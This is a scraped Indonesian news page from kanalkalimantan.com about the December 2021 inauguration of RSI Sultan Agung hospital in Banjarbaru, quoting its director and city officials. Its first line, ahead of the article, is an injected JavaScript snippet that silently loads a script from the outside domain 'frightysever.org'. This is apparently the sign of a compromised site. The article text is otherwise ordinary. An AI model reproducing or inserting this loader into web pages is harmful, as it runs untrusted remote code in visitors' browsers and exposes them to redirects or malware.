(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Grand Launching RSI Sultan Agung Banjarbaru di Kota Citra Graha


KANALKALIMANTAN.COM, BANJABARU – Suatu kebanggaan tersendiri bagi warga Banjarbaru, Rumah Sakit Islam (RSI) Sultan Agung Banjarbaru diresmikan, Kamis (9/12/2021).

RSI Sultan Agung Banjarbaru yang berada di Jalan A Yani Km 18 Kota Citra Graha ini merupakan anak cabang pertama yang ada di Indonesia, setelah RSI Sultan Agung Semarang, Jawa Tengah.

Direktur RSI Sultan Agung Banjarbaru, Rifqiannor mengatakan, RSI Sultan Agung Banjarbaru resmi mendapatkan izin operasional pada tanggal 31 Maret 2021 lalu, dan sudah melalukan soft launching pada 19 April 2021.

“Sesuai salah satu misi rumah sakit, RSI Sultan Agung Banjarbaru diharapakan dapat memberikan pelayanan kesehatan yang selamat menyelamatkan, dijiwai, semangat mencintai Allah menyayangi sesama,” ujarnya.

 

 

Baca juga: Tinggal Seorang Diri, Kakek di Kelayan B Ditemukan Tak Bernyawa Membiru

Rifqiannor menambahkan, di RSI Sultan Agung telah melakukan pelayanan IGD 24 jam, pelayanan rawat inap, pelayanan penunjang, pelayanan untuk pasien Covid-19, serta pelayanan poliklinik umum dan berbagai macam spesialis.

“Kami berharap kedepannnya RSI Sultan Agung Banjarbaru akan terus konsisten dalam memberikan pelayanan kesehatan yang terkemuka dan menjadi pembangun peradaban Islam menuju masayarakat sehat sejahtera yang dirahmati Allah, khususnya di Kota Banjarbaru,” harapnya.

Di RSI Sultan Agung Banjarbaru, menyediakan fasilitas kesehatan islam RS yang terbaik.

“Insyaallah, atas dasar Izzul Islam wal Muslimin, insyaallah dibangun dengan baik, peralatan yang terbaik,” ucap Masyhudi, Kepala BOD SRISA Grup.

Baca juga: Sekda HSU Akui Uang 100 Juta Disita KPK dari Rumahnya

Dilanjutkannya, pelayanan RSI Sultan Agung selama memakai BPJS maka layanan kesehatan di RSI semuanya gratis.“Kalau sesuai aturan bagi pengguna BPJS di RSI Sultan Agung gratis,” ujarnya.

Sementara itu, Sekretaris Daerah (Sekda) Kota Banjarbaru, Said Abdullah memberikan apreasi kepada RSI Sultan Agung Banjarbaru.

“Pemko dan masyarakat Kota Banjarbaru mengucapkan penghargaan terima kasih, atas adanya RSI Sultan Agung di sini,” ungkapnya.

Diakui Said, dirinya akan menjadi salah satu marketing RSI Sultan Agung Banjarbaru. “Insyaallah, saya salah satu yang akan jadi marketternya,” akunya.

Baca juga: Melatih Kaum Perempuan Desa Pulau Tambak Bikin Usaha Baru 

Dikatakan Said, RSI Sultan Agung Banjarbaru sangat strategis karena terletak berdekatan dengan Kabupaten Banjar dan Kota Banjarmasin.

“Letaknya sudah tepat sekali, berada di perbatasan Kota Banjarbaru, jadi ini pelayanan bukan hanya untuk Banjarbaru, tapi juga untuk Kalsel,” tandasnya. (kanalkalimantan.com/ibnu)

Reporter : ibnu
Editor : bie


Risa

Recent Posts

DPRD Banjarbaru Target Tiga Raperda Inisiatif Selesai Dalam Tiga Bulan

KANALKALIMANTAN.COM, BANJARBARU - Tiga buah Rancangan Peraturan Daerah (Raperda) inisiatif ditargetkan selesai dalam waktu tiga… Read More

2 jam ago

Berbaur dengan Masyarakat, Bupati dan Wabup Banjar Nobar Indonesia Vs Uzbekistan

KANALKALIMANTAN.COM, MARTAPURA - Alun-alun Ratu Zalecha, Martapura dipilih menjadi tempat nonton bareng (nobar) Semi Final… Read More

6 jam ago

Diakhiri Nobar Timnas, Pj Bupati Kapuas Menutup Expo Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi secara resmi menutup gelaran Expo… Read More

9 jam ago

Bingkisan Kebahagiaan PLN untuk Warga Kalsel yang Membutuhkan

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur (UIP3B) Kalimantan melalui… Read More

9 jam ago

Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024

KANALKALIMANTAN.COM, BANJARMASIN - Nonton bareng (Nobar) laga semifinal AFC U-23 Indonesia vs Uzbekistan di halaman… Read More

9 jam ago

Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS – Tiga rekor Museum Rekor Indonesia (Muri) menjadi catatan kado Hari Jadi… Read More

9 jam ago

This website uses cookies.